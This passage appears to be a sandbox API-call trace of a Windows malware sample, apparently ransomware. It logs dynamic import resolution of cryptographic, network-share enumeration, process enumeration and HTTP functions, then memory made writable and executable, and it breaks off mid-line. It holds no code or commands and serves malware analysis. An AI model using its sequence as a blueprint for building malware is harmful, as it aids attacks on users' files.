[0157.713] GetProcAddress (hModule=0x752e0000, lpProcName="GetForegroundWindow") returned 0x75302320 [0157.713] GetProcAddress (hModule=0x752e0000, lpProcName="CloseWindow") returned 0x7533999a [0157.713] GetProcAddress (hModule=0x752e0000, lpProcName="PostQuitMessage") returned 0x752f9abb [0157.713] GetProcAddress (hModule=0x752e0000, lpProcName="ShutdownBlockReasonCreate") returned 0x7535a84e [0157.714] GetProcAddress (hModule=0x752e0000, lpProcName="DefWindowProcA") returned 0x776624e0 [0157.714] GetProcAddress (hModule=0x752e0000, lpProcName="DeferWindowPos") returned 0x7530640f [0157.714] GetProcAddress (hModule=0x752e0000, lpProcName="EnumChildWindows") returned 0x75300e94 [0157.714] GetProcAddress (hModule=0x752e0000, lpProcName="wsprintfW") returned 0x7531e061 [0157.714] GetProcAddress (hModule=0x752e0000, lpProcName="ShutdownBlockReasonDestroy") returned 0x7535a88e [0157.714] GetProcAddress (hModule=0x752e0000, lpProcName="RegisterClassExW") returned 0x752fb17d [0157.714] GetProcAddress (hModule=0x752e0000, lpProcName="CreateWindowExW") returned 0x752f8a29 [0157.714] GetProcAddress (hModule=0x752e0000, lpProcName="GetMessageA") returned 0x752f7bd3 [0157.714] GetProcAddress (hModule=0x752e0000, lpProcName="TranslateMessage") returned 0x752f7809 [0157.714] GetProcAddress (hModule=0x752e0000, lpProcName="DispatchMessageA") returned 0x752f7bbb [0157.715] GetProcAddress (hModule=0x752e0000, lpProcName="ReleaseDC") returned 0x752f7446 [0157.715] GetProcAddress (hModule=0x752e0000, lpProcName="DestroyWindow") returned 0x752f9a55 [0157.715] GetProcAddress (hModule=0x752e0000, lpProcName="AdjustWindowRect") returned 0x7530c6c6 [0157.715] GetProcAddress (hModule=0x752e0000, lpProcName="AnimateWindow") returned 0x7530b531 [0157.715] GetProcAddress (hModule=0x752e0000, lpProcName="MessageBoxW") returned 0x7534fd3f [0157.715] GetProcAddress (hModule=0x752e0000, lpProcName="wsprintfA") returned 0x7530ae5f [0157.715] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75640000 [0157.715] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.715] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x80000 [0157.715] VirtualFree (lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.715] GetProcAddress (hModule=0x75640000, lpProcName="DeleteObject") returned 0x75655689 [0157.715] GetProcAddress (hModule=0x75640000, lpProcName="SetPixel") returned 0x7565ccee [0157.716] GetProcAddress (hModule=0x75640000, lpProcName="GetDeviceCaps") returned 0x75654de0 [0157.716] GetProcAddress (hModule=0x75640000, lpProcName="SelectPalette") returned 0x75655a86 [0157.716] GetProcAddress (hModule=0x75640000, lpProcName="SetPaletteEntries") returned 0x7568535b [0157.716] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x77110000 [0157.716] VirtualQuery (in: lpAddress=0x80000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.716] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x70000 [0157.716] VirtualFree (lpAddress=0x80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.716] GetProcAddress (hModule=0x77110000, lpProcName="LocalAlloc") returned 0x7712168c [0157.716] GetProcAddress (hModule=0x77110000, lpProcName="ReadFile") returned 0x77123ed3 [0157.716] GetProcAddress (hModule=0x77110000, lpProcName="CloseHandle") returned 0x77121410 [0157.716] GetProcAddress (hModule=0x77110000, lpProcName="WriteFile") returned 0x77121282 [0157.716] GetProcAddress (hModule=0x77110000, lpProcName="DeviceIoControl") returned 0x7712322f [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="OpenMutexW") returned 0x77125151 [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="CreateMutexW") returned 0x7712424c [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="lstrlenA") returned 0x77125a4b [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="ExitProcess") returned 0x77127a10 [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="GetModuleHandleA") returned 0x77121245 [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="VirtualAlloc") returned 0x77121856 [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="LoadLibraryA") returned 0x771249d7 [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="lstrcpyA") returned 0x77142a9d [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="lstrcatA") returned 0x77142b7a [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="GetProcAddress") returned 0x77121222 [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="lstrlenW") returned 0x77121700 [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="CreateDirectoryW") returned 0x77124259 [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="GetLastError") returned 0x771211c0 [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="OutputDebugStringW") returned 0x7714d1d4 [0157.717] GetProcAddress (hModule=0x77110000, lpProcName="TlsGetValue") returned 0x771211e0 [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="CreateFileW") returned 0x77123f5c [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="HeapAlloc") returned 0x7764e026 [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="lstrcpynW") returned 0x7714d556 [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="GetFileSize") returned 0x7712196e [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="FindNextFileW") returned 0x771254ee [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="lstrcmpW") returned 0x77125929 [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="FindClose") returned 0x77124442 [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="GetTickCount") returned 0x7712110c [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="VirtualFree") returned 0x7712186e [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="ExitThread") returned 0x7767d598 [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="CreateThread") returned 0x771234d5 [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="WaitForSingleObject") returned 0x77121136 [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="TlsSetValue") returned 0x771214fb [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="CreateToolhelp32Snapshot") returned 0x7714735f [0157.718] GetProcAddress (hModule=0x77110000, lpProcName="CreateFileA") returned 0x771253c6 [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="Process32NextW") returned 0x7714896c [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="GetModuleHandleW") returned 0x771234b0 [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="GetSystemDirectoryW") returned 0x77125063 [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="CreateProcessW") returned 0x7712103d [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="GetShortPathNameW") returned 0x7712d2f9 [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="ExpandEnvironmentStringsW") returned 0x77124173 [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="Sleep") returned 0x771210ff [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="GetCurrentProcessId") returned 0x771211f8 [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="VirtualQuery") returned 0x7712445a [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="VirtualProtect") returned 0x7712435f [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="IsBadReadPtr") returned 0x7714d075 [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="FreeLibrary") returned 0x771234c8 [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="lstrcmpA") returned 0x7713eceb [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="UnmapViewOfFile") returned 0x77121826 [0157.719] GetProcAddress (hModule=0x77110000, lpProcName="lstrcmpiW") returned 0x7713d5cd [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="lstrcpyW") returned 0x77143102 [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="MoveFileExW") returned 0x77139b2d [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="FindFirstFileW") returned 0x77124435 [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="WaitForMultipleObjects") returned 0x77124220 [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="GetDriveTypeW") returned 0x7712418b [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="GetTickCount64") returned 0x7713eee0 [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="SetThreadExecutionState") returned 0x7713f747 [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="GetFileSizeEx") returned 0x771259e2 [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="IsProcessorFeaturePresent") returned 0x77125235 [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="CreateFileMappingW") returned 0x77121909 [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="MapViewOfFile") returned 0x771218f1 [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="GetCurrentProcess") returned 0x77121809 [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="LocalFree") returned 0x77122d3c [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="GetUserDefaultUILanguage") returned 0x771244ab [0157.720] GetProcAddress (hModule=0x77110000, lpProcName="InitializeCriticalSection") returned 0x77652c42 [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="DeleteCriticalSection") returned 0x776545f5 [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="SetLastError") returned 0x771211a9 [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="EnterCriticalSection") returned 0x776422b0 [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="LeaveCriticalSection") returned 0x77642270 [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="TerminateThread") returned 0x77127a2f [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="GlobalAlloc") returned 0x7712588e [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="GlobalFree") returned 0x77125558 [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="Beep") returned 0x771952e8 [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="GetWindowsDirectoryA") returned 0x77142b0a [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="MoveFileExA") returned 0x7714ccc1 [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="GetVersionExA") returned 0x77123519 [0157.721] GetProcAddress (hModule=0x77110000, lpProcName="Process32FirstW") returned 0x77148baf [0157.722] GetProcAddress (hModule=0x77110000, lpProcName="lstrcatW") returned 0x7714828e [0157.722] GetProcAddress (hModule=0x77110000, lpProcName="SetFilePointerEx") returned 0x7713c807 [0157.722] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77010000 [0157.722] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.722] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x80000 [0157.722] VirtualFree (lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.722] GetProcAddress (hModule=0x77010000, lpProcName="LsaAddAccountRights") returned 0x77058819 [0157.722] GetProcAddress (hModule=0x77010000, lpProcName="LsaFreeMemory") returned 0x7702ede1 [0157.722] GetProcAddress (hModule=0x77010000, lpProcName="LsaClose") returned 0x77031af7 [0157.722] GetProcAddress (hModule=0x77010000, lpProcName="EncryptionDisable") returned 0x77052b27 [0157.722] GetProcAddress (hModule=0x77010000, lpProcName="InitializeSecurityDescriptor") returned 0x77024620 [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="CryptDecrypt") returned 0x77053178 [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="CryptEncrypt") returned 0x7703779b [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="CryptImportKey") returned 0x7701c532 [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="GetSidSubAuthority") returned 0x77020e24 [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="GetSidSubAuthorityCount") returned 0x77020e0c [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="EqualDomainSid") returned 0x770532d8 [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="CryptReleaseContext") returned 0x7701e124 [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="CryptDestroyKey") returned 0x7701c51a [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="AreAllAccessesGranted") returned 0x770530a8 [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="CryptGenRandom") returned 0x7701dfc8 [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="CryptExportKey") returned 0x770191ea [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="CryptGenKey") returned 0x77018ee9 [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="CryptAcquireContextW") returned 0x7701df14 [0157.723] GetProcAddress (hModule=0x77010000, lpProcName="LookupAccountSidW") returned 0x77024874 [0157.724] GetProcAddress (hModule=0x77010000, lpProcName="LsaQueryTrustedDomainInfo") returned 0x77058949 [0157.724] GetProcAddress (hModule=0x77010000, lpProcName="LsaCreateTrustedDomainEx") returned 0x770594c1 [0157.724] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x756d0000 [0157.728] VirtualQuery (in: lpAddress=0x80000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.728] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x70000 [0157.728] VirtualFree (lpAddress=0x80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.728] GetProcAddress (hModule=0x756d0000, lpProcName="ShellExecuteExW") returned 0x756f1e46 [0157.729] GetProcAddress (hModule=0x756d0000, lpProcName="SHGetFolderPathW") returned 0x75755708 [0157.729] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x75130000 [0157.801] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.801] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x80000 [0157.802] VirtualFree (lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.802] GetProcAddress (hModule=0x75130000, lpProcName="LsaConnectUntrusted") returned 0x751928c3 [0157.802] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x75110000 [0157.941] VirtualQuery (in: lpAddress=0x80000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.942] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x70000 [0157.942] VirtualFree (lpAddress=0x80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.942] GetProcAddress (hModule=0x75110000, lpProcName="DsRoleGetPrimaryDomainInformation") returned 0x750c1f3d [0157.966] GetProcAddress (hModule=0x75110000, lpProcName="DsRoleFreeMemory") returned 0x750c19a9 [0157.966] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76570000 [0157.966] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.966] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x80000 [0157.966] VirtualFree (lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.967] GetProcAddress (hModule=0x76570000, lpProcName="StrToIntA") returned 0x7659cd65 [0157.967] GetProcAddress (hModule=0x76570000, lpProcName="StrStrW") returned 0x7657e52d [0157.967] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x750a0000 [0157.974] VirtualQuery (in: lpAddress=0x80000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.974] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x70000 [0157.974] VirtualFree (lpAddress=0x80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.975] GetProcAddress (hModule=0x750a0000, lpProcName="WNetOpenEnumW") returned 0x750a2f06 [0157.975] GetProcAddress (hModule=0x750a0000, lpProcName="WNetEnumResourceW") returned 0x750a3058 [0157.975] GetProcAddress (hModule=0x750a0000, lpProcName="WNetCloseEnum") returned 0x750a2dd6 [0157.975] GetProcAddress (hModule=0x750a0000, lpProcName="WNetAddConnection2W") returned 0x750a4744 [0157.977] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x767f0000 [0158.008] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.008] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x80000 [0158.008] VirtualFree (lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.008] GetProcAddress (hModule=0x767f0000, lpProcName=0x16) returned 0x767f449d [0158.008] GetProcAddress (hModule=0x767f0000, lpProcName=0x3) returned 0x767f3918 [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0x4) returned 0x767f6bdd [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0x9) returned 0x767f2d8b [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0xb) returned 0x767f311b [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0x6f) returned 0x767f37ad [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0x74) returned 0x767f3c5f [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0x17) returned 0x767f3eb8 [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0x73) returned 0x767f3ab2 [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName="inet_pton") returned 0x76803969 [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0x13) returned 0x767f6f01 [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0x10) returned 0x767f6b0e [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0xc) returned 0x767fb131 [0158.009] GetProcAddress (hModule=0x767f0000, lpProcName=0x34) returned 0x76807673 [0158.010] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x751e0000 [0158.017] VirtualQuery (in: lpAddress=0x80000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.017] VirtualAlloc (lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x4) returned 0x70000 [0158.017] VirtualFree (lpAddress=0x80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.018] GetProcAddress (hModule=0x751e0000, lpProcName="InternetReadFile") returned 0x751fb406 [0158.018] GetProcAddress (hModule=0x751e0000, lpProcName="InternetCloseHandle") returned 0x751fab49 [0158.018] GetProcAddress (hModule=0x751e0000, lpProcName="HttpQueryInfoA") returned 0x751fa33e [0158.018] GetProcAddress (hModule=0x751e0000, lpProcName="HttpSendRequestA") returned 0x752718f8 [0158.018] GetProcAddress (hModule=0x751e0000, lpProcName="HttpOpenRequestA") returned 0x75204c7d [0158.018] GetProcAddress (hModule=0x751e0000, lpProcName="InternetConnectA") returned 0x752049e9 [0158.018] GetProcAddress (hModule=0x751e0000, lpProcName="InternetCrackUrlA") returned 0x751ed075 [0158.018] GetProcAddress (hModule=0x751e0000, lpProcName="InternetOpenA") returned 0x7520f18e [0158.018] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x765d0000 [0158.018] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.018] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x80000 [0158.019] VirtualFree (lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.019] GetProcAddress (hModule=0x765d0000, lpProcName="CryptBinaryToStringW") returned 0x7660a546 [0158.019] GetProcAddress (hModule=0x765d0000, lpProcName="CryptStringToBinaryA") returned 0x76605d77 [0158.019] GetProcAddress (hModule=0x765d0000, lpProcName="CryptBinaryToStringA") returned 0x7660a8c5 [0158.019] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76d60000 [0158.019] VirtualQuery (in: lpAddress=0x80000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.019] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x70000 [0158.019] VirtualFree (lpAddress=0x80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.020] GetProcAddress (hModule=0x76d60000, lpProcName="CoInitializeEx") returned 0x76da09ad [0158.020] GetProcAddress (hModule=0x76d60000, lpProcName="CoUninitialize") returned 0x76da86d3 [0158.020] GetProcAddress (hModule=0x76d60000, lpProcName="CoCreateInstance") returned 0x76da9d0b [0158.020] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76760000 [0158.020] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x8df8f0, dwLength=0x1c | out: lpBuffer=0x8df8f0*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.020] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x80000 [0158.020] VirtualFree (lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.020] GetProcAddress (hModule=0x76760000, lpProcName=0x9) returned 0x76763eae [0158.020] GetProcAddress (hModule=0x76760000, lpProcName=0x8) returned 0x76763ed5 [0158.020] VirtualProtect (in: lpAddress=0xb1000, dwSize=0x36a00, flNewProtect=0x40, lpflOldProtect=0x8df97c | out: lpflOldProtect=0x8df97c*=0x4) returned 1 [0158.026] VirtualProtect (in: lpAddress=0xe8000, dwSize=0xfe00, flNewProtect=0x40, lpflOldProtect=0x8df97c | out: lpflOldProtect=0x8df97c*=0x4) returned 1 [0158.029] VirtualProtect (in: lpAddress=0xf8000, dwSize=0x10400, flNewProtect=0x40, lpflOldProtect=0x8df97c | out: lpflOldProtect=0x8df97c*=0x4) returned 1 [0158.033] VirtualProtect (in: lpAddress=0xb0000, dwSize=0x5c000, flNewProtect=0x40, lpflOldProtect=0x8df9c0 | out: lpflOldProtect=0x8df9c0*=0x4) returned 1 [0158.053] lstrlenA (lpString="kernel32.dll") returned 12 [0158.054] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0158.054] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0158.054] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0158.054] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0158.054] lstrlenA (lpString="ADDATOMA") returned 8 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0158.054] lstrlenA (lpString="ADDATOMW") returned 8 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0158.054] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0158.054] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0158.054] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0158.054] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0158.054] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0158.054] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0158.054] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0158.054] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0158.054] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0158.054] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0158.054] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0158.054] lstrcpyA (in: lpString1=0x8decf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0158.055] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0158.055] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0158.055] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0158.055] lstrcpyA (in: lpString1=0x8decf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0158.055] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0158.055] lstrcpyA (in: 